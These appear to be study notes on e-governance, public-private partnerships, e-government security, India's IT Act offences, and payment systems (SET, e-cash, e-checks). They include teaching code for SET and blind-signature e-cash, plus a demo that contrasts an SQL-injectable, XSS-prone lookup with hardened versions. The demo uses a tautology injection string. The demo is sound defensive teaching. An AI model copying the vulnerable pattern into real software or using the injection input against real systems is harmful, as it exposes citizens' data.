In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one’s home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) – Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) – Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter

• Generally, but not always, involving:

– Long Term Contracts

– User Charges and/or Payments flowing between the Parties

– Shared Investments, but Mainly Private


– Risk Sharing by the Parties

• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

• Fiscal Head Room

• As a Way of Financing the Project

• Separate Policy & Regulation from Operations


• Make the Good or Service Available

• Pay for Performance and Output

• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3’s include four basic characteristics:

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps


Crafting the Partnership

Implementing the Partnership

Project Management –

Six Distinct Phases

Genesis

What’s the need?

What’s driving the need / rationale?

Facility non-compliance, natural disaster, budget deficit

Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility

Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?

Market Research

Economic/Financial Analysis

Program, Budget and Schedule

Risk Analysis

Plan and Test

Final project definition

What is the best way to complete the project?

Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback and economics?

Master Schedule/Budget

Political Climate

Any potential “fatal flaws” that could derail the project?

Procurement and Contracting

How do you choose and contract with the best-value private partner?

What’s the best delivery method?

Design-Bid-Build

Design-Build

Finance-Design-Build

What do current statutes allow?

Procurement Approach

Sole Source, RFP, Low Bid

Risk Allocation between Public and Private Partners

Structuring of Contract/Risks and Rewards


Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms) and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION. The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY. A central challenge of an e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

understanding an organization’s information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization’s overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS; and continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication – capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.

Authorization – capability to give rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.

Confidentiality – capability to prevent unauthorized access to information.

Integrity – capability to prevent information from unauthorized modification, ensuring that information can be relied upon and is accurate and complete.

Traceability – capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation – capability to prevent the person or system intervening in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units

Protecting software applications used to process personal data

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS. Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness

Continually improve its control environment

Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found that 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
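The two vulnerability classes named in this paragraph, shown as an added example that is not code from any e-Government site or from the cited research: a record lookup that splices untrusted input into SQL beside its parameterised form, plus page rendering with and without HTML escaping. The citizens table, its rows and the citizen-id format are constructed for the example.

```python
import html
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for a portal database, held in memory so the
    example runs offline."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE citizens (citizen_id TEXT PRIMARY KEY, name TEXT)")
    con.executemany(
        "INSERT INTO citizens VALUES (?, ?)",
        [("C-1001", "Asha"), ("C-1002", "Ravi"), ("C-1003", "Meera")],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, citizen_id: str) -> list:
    """SQL injection: the request parameter is spliced into the SQL text, so
    a quote character in it changes the query instead of the data."""
    query = f"SELECT name FROM citizens WHERE citizen_id = '{citizen_id}'"
    return [row[0] for row in con.execute(query)]


def lookup_hardened(con: sqlite3.Connection, citizen_id: str) -> list:
    """Parameterised query: the driver binds the value as data, so the SQL
    structure is fixed no matter what the string contains."""
    rows = con.execute(
        "SELECT name FROM citizens WHERE citizen_id = ?", (citizen_id,)
    )
    return [row[0] for row in rows]


# Allow-list validation as defence in depth. The id format (letter C, dash,
# four digits) is an assumption made for this example.
CITIZEN_ID_RE = re.compile(r"C-\d{4}")


def is_valid_citizen_id(citizen_id: str) -> bool:
    return CITIZEN_ID_RE.fullmatch(citizen_id) is not None


def render_vulnerable(name: str) -> str:
    """XSS: data from the database (or a form) is written straight into HTML,
    so any markup it carries is interpreted by the browser."""
    return f"<p>Welcome, {name}</p>"


def render_hardened(name: str) -> str:
    """Contextual output encoding: markup characters become entities and are
    displayed as text rather than executed."""
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"


def demo() -> dict:
    """Run both forms on a normal id, the textbook tautology input, and a
    stored name that carries markup; return what each one produced."""
    con = make_db()
    tautology = "' OR '1'='1"       # constructed injection-style input
    markup_name = "<b>Ravi</b>"     # constructed name containing HTML
    return {
        "normal_vulnerable": lookup_vulnerable(con, "C-1002"),
        "normal_hardened": lookup_hardened(con, "C-1002"),
        "inject_vulnerable": lookup_vulnerable(con, tautology),  # every row
        "inject_hardened": lookup_hardened(con, tautology),      # no match
        "inject_validated": is_valid_citizen_id(tautology),      # rejected
        "xss_vulnerable": render_vulnerable(markup_name),
        "xss_hardened": render_hardened(markup_name),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```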

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression ‘Crime’ is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. The “Offence” is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of “voice” and “phishing”. Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

Secures access

Downloads, copies or extracts any data, computer database or any information

Introduces or causes to be introduced any virus or contaminant

Disrupts or causes disruption

Denies or causes denial of access to any person

Provides any assistance to any person to facilitate access

Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be

punishable with imprisonment for a term which may extend to two three years or with fine which

may extend to five lakh rupees or with bothrdquo [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

- any information that is grossly offensive or has menacing character; or
- any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
- any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted, in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."

IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN resolution, India passed the Information Technology Act, 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act, 2000 has been substantially amended through the Information Technology (Amendment) Act, 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions:

The Information Technology Act, 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act, 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences:

Section | Offence | Punishment
65 | Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms:

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


SET PROTOCOL

The SET protocol has four phases: initiation, purchase, authorization and capture.

- First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.
- In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.
- In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.
- Finally, the merchant requests a money transfer to its account.
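The four phases above as a runnable simulation. This is an added example, not code from the original notes and not SET's real message formats: the three parties (cardholder, merchant, payment gateway standing in for the issuer side), the message field names, the per-card credit limits and the rule that a capture must refer to an earlier authorization and cannot exceed it are all assumptions made for the demo. Real SET additionally uses certificates and a dual signature so that the merchant never reads the card details it forwards; that part is not modelled here.

```python
"""Simplified SET-style purchase flow (constructed example).

Phases, following the notes: initiation -> purchase -> authorization -> capture.
Account data, message field names and amounts are constructed for the demo.
"""
from dataclasses import dataclass, field
import secrets


@dataclass
class PaymentGateway:
    """Stands in for the acquirer/issuer side: reserves, approves and settles amounts."""
    issuer_limits: dict                      # card number -> remaining credit (constructed)
    merchant_balance: int = 0
    authorizations: dict = field(default_factory=dict)   # auth code -> reserved amount

    def authorize(self, request):
        card, amount = request["card"], request["amount"]
        if self.issuer_limits.get(card, 0) < amount:
            return {"approved": False}
        self.issuer_limits[card] -= amount          # reserve the funds
        code = secrets.token_hex(4)
        self.authorizations[code] = amount
        return {"approved": True, "auth_code": code}

    def capture(self, request):
        code, amount = request["auth_code"], request["amount"]
        reserved = self.authorizations.get(code)
        # a capture must match a prior authorization and must not exceed it
        if reserved is None or amount > reserved:
            return {"captured": False}
        del self.authorizations[code]
        self.merchant_balance += amount
        return {"captured": True}


class Merchant:
    def __init__(self, gateway):
        self.gateway = gateway
        self.orders = {}

    def initiation_response(self, init_request):
        """Phase 1: answer the cardholder's initiation request with an order id."""
        order_id = secrets.token_hex(4)
        self.orders[order_id] = {"state": "initiated"}
        return {"order_id": order_id}

    def purchase(self, order_id, amount, payment_instruction):
        """Phases 2 and 3: take the order plus payment instruction, ask the gateway for authorization."""
        order = self.orders[order_id]
        order.update(amount=amount, state="ordered")
        result = self.gateway.authorize({"card": payment_instruction["card"], "amount": amount})
        if result["approved"]:
            order["auth_code"] = result["auth_code"]
            order["state"] = "authorized"
        else:
            order["state"] = "declined"
        return order["state"]

    def capture(self, order_id):
        """Phase 4: request the money transfer; only valid after a successful authorization."""
        order = self.orders[order_id]
        if order["state"] != "authorized":
            return False
        ok = self.gateway.capture({"auth_code": order["auth_code"], "amount": order["amount"]})["captured"]
        if ok:
            order["state"] = "captured"
        return ok


def run_purchase(amount, card="4111-demo", limit=100):
    """Run all four phases for one purchase; returns (final order state, merchant balance)."""
    gateway = PaymentGateway(issuer_limits={card: limit})
    merchant = Merchant(gateway)
    order_id = merchant.initiation_response({"items": ["ebook"]})["order_id"]   # phase 1
    state = merchant.purchase(order_id, amount, {"card": card})                 # phases 2-3
    if state == "authorized":
        merchant.capture(order_id)                                                # phase 4
    return merchant.orders[order_id]["state"], gateway.merchant_balance


if __name__ == "__main__":
    print(run_purchase(40))    # ('captured', 40)
    print(run_purchase(140))   # ('declined', 0)
```

The state machine in `Merchant` is the point: a capture that is not preceded by an authorization, or that asks for more than was authorized, is refused, which is the ordering the four phases impose.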

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card.

The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

- Issuers
- Customers
- Merchants or traders
- Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are the related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

- Account setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts from various E-Cash issuers. Issuers typically handle accounting for customers and merchants.
- Purchase: Customers purchase certain goods or services and give the merchants tokens which represent equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.
- Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system:

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained in the following steps.

- The customer approaches his issuer's (bank's) site to access his account. The issuer in return issues the money in the form of tokens, generally in denominations of tens and hundreds or as specified by the customer.
- In the second phase, the customer will endorse those tokens to the merchant for acquiring services, for which the customer will authenticate the payment for the trader.
- In the third phase, the trader will approach the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank will convert the tokens into electronic funds and the same will be transferred into the trader's account.
- Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

E-cash is a system that allows a person to pay for goods or services by transmitting a number from one computer to another.

- Like the serial numbers on real currency notes, the E-cash numbers are unique.
- E-cash is issued by a bank and represents a specified sum of real money.
- It is anonymous and reusable.

Electronic Cash Security:

- Complex cryptographic algorithms prevent double spending.
- Anonymity is preserved unless double spending is attempted.
- Serial numbers can allow tracing to prevent money laundering.
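The three security properties above (unique serial numbers, anonymity towards the issuer, double-spend detection) in working form. This is an added example, not from the original notes and not any real e-cash product: it uses a textbook RSA blind signature so the bank signs a token without ever seeing its serial number, and the bank keeps a set of redeemed serials so a second deposit of the same token is refused. The fixed key (two Mersenne primes), the hashing of the serial, and the idea that the token's value is implied by the signing key are assumptions made so the example runs offline; a real issuer would use a proper key size and padding.

```python
"""Constructed example: serial-numbered e-cash tokens, blind RSA signatures,
and double-spend detection at the issuer.

Textbook RSA with two fixed Mersenne primes keeps the example self-contained;
it is not a production-strength key.
"""
import hashlib
import secrets

# Fixed demo key (constructed): p = 2^89 - 1 and q = 2^107 - 1 are both prime.
P = (1 << 89) - 1
Q = (1 << 107) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # issuer's private exponent


def serial_digest(serial: str) -> int:
    """Map a token serial number to the integer that gets signed (mod N)."""
    return int.from_bytes(hashlib.sha256(serial.encode()).digest(), "big") % N


class Issuer:
    """The bank: signs blinded tokens and later redeems them, refusing any serial seen before.
    In this demo every token signed with the key is worth the same fixed amount (assumption)."""

    def __init__(self):
        self.spent = set()
        self.redeemed_value = 0

    def sign_blinded(self, blinded: int) -> int:
        # The issuer only ever sees the blinded value, never the serial itself.
        return pow(blinded, D, N)

    def redeem(self, serial: str, signature: int, value: int) -> bool:
        if pow(signature, E, N) != serial_digest(serial):
            return False                  # forged or corrupted token
        if serial in self.spent:
            return False                  # double spending detected
        self.spent.add(serial)
        self.redeemed_value += value
        return True


def withdraw(issuer: Issuer, value: int) -> dict:
    """Customer side: pick a fresh serial, blind it, get it signed, unblind the signature."""
    serial = secrets.token_hex(16)
    h = serial_digest(serial)
    r = secrets.randbelow(N - 2) + 2                 # blinding factor (coprime to N w.h.p.)
    blinded = (h * pow(r, E, N)) % N
    signed_blinded = issuer.sign_blinded(blinded)
    signature = (signed_blinded * pow(r, -1, N)) % N
    assert pow(signature, E, N) == h                 # customer checks the unblinded signature
    return {"serial": serial, "signature": signature, "value": value}


def demo():
    """Withdraw one token, deposit it twice, then try a forged one."""
    issuer = Issuer()
    token = withdraw(issuer, 10)
    first = issuer.redeem(token["serial"], token["signature"], token["value"])   # merchant deposits
    second = issuer.redeem(token["serial"], token["signature"], token["value"])  # same token again
    forged = issuer.redeem("not-a-real-serial", 12345, 10)                       # no valid signature
    return first, second, forged, issuer.redeemed_value


if __name__ == "__main__":
    print(demo())   # (True, False, False, 10)
```

The blinding is what gives the anonymity the notes mention: the value the bank signs (`blinded`) is unrelated, from the bank's point of view, to the serial later deposited by the merchant. The spent-serial set is what enforces "prevents double spending" for a token that is otherwise freely copyable.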

E-Cash Processing

E-cash security:

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential such as a card password is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind the risk of Internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on the safe "https" protocol, and using proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages:

- We can transfer funds, purchase stocks and offer a variety of other services without having to handle physical cash or cheques.
- Electronic cash protects its user against theft. With electronic cash the customer does not need to provide financial information.
- E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit below which no additional charges apply, which is why very low payments are not charged a fee.

Limitations:

- However secure the e-cash payment system may be, no one is safe against online fraud. In this case the fraudulent party is the trader: the trader may take the amount but not provide the services.
- While making the payment it is very important that the Internet connection and power supply stay active. If the payment is in process and the Internet connection fails in between, it can lead to loss of information, i.e. the amount will be charged but it won't reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.
- E-Cash is not for everyone. Low-income segments without computer and Internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low-income group readiness and technology reliability issues will make E-Cash better. Countries such as India, where people were hesitant to use such methods, have shown tremendous uptake of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.

E-CHECK

What is an electronic check?

It's simply an electronic version of a paper check. When you convert a traditional check into an electronic payment, you can process it through the Automated Clearing House (ACH) Network to save time and money, and because electronic checks have more security features than a paper check, they better protect your business and customers. Another way to think of an electronic check is when a customer pays by entering their bank account information online and electronically sending the money. Electronic checks are becoming increasingly popular because they are so fast, efficient and secure. Electronic checks are sometimes called eChecks, electronic check conversions or Back Office Conversions (BOCs). Read more on what you need to know as you consider using eChecks in your business.

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First, you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval, the virtual terminal will print a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You'll be able to view and report on your merchant transactions online, although features may vary depending on your merchant service provider or your payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It's a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to electronically transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster. Clients give their bank routing or checking account number and, after verification, the payment is transferred almost immediately, electronically, through the ACH system. Besides checks, the ACH Network also handles debit card transactions; direct deposits of payroll, Social Security and other government benefits; direct debit payments; and business-to-business payments.

Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks helps save time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. However, time saving and hassle reduction are not the only benefits. Read on for more.

1. Reduce processing costs by up to 60%. eChecks require less manpower to process and don't come with any deposit or transaction fees. As a result, processing an eCheck is generally much cheaper than processing a paper check or credit card transaction.
2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing. Billing companies often receive payments within one day.
3. Increase sales. If your business doesn't accept paper checks, offering eChecks expands your customers' options and can increase sales. If you're converting from paper checks to eChecks, you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.
4. Work smarter and greener. Electronic check conversion is easy to set up. It relies on the trusted ACH Network. And eChecks help reduce the more than 674 million gallons of fuel used and 3.6 million tons of greenhouse gas emissions created by transporting paper checks.
5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain, monitor and check files against negative account databases that store information about individuals or companies that have records of fraud.

Protecting your business and your customers

Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features.

